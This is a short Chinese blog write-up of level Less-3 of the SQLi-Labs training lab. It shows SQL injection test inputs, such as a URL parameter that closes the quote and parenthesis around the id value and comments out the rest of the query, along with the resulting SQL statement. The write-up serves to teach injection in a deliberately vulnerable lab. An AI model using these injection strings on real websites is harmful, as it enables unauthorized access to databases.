心 空

  • Tools
Ricky Hao
  1. 首页
  2. SQLLAB
  3. 正文

Less-3

28 8 月, 2015 1907点热度 0人点赞 0条评论

less-3.png

源码:
未过滤,但变量id加了引号和括号。将变量id以字符串形式引入,和Less-1很像,但是却又多了个括号,猜测是防止注入语句。
注入测试:

?id=12+and+1=1                                显示正确
?id=12+an                        不完全语句也显示正确

猜测:括号将变量限制在括号范围内,尝试手动提前匹配括号注入。

?id=12%27                        成功报错:''12'') LIMIT 0,1' at line 1
?id=1%27%29and+1=2%23                                无显示,可注入

上面那条语句还原到SQL语句时,为:

SELECT * FORM users WHERE id=('1')and 1=2#') LIMIT 0,1

将括号提前结束且用#号注释掉接下来的语句。接下来的注入只要替换and 1=1语句就行了。

本作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
标签: sql sqllab
最后更新:28 8 月, 2015

Ricky

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复

这个站点使用 Akismet 来减少垃圾评论。了解你的评论数据如何被处理。

COPYRIGHT © 2025 心 空. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang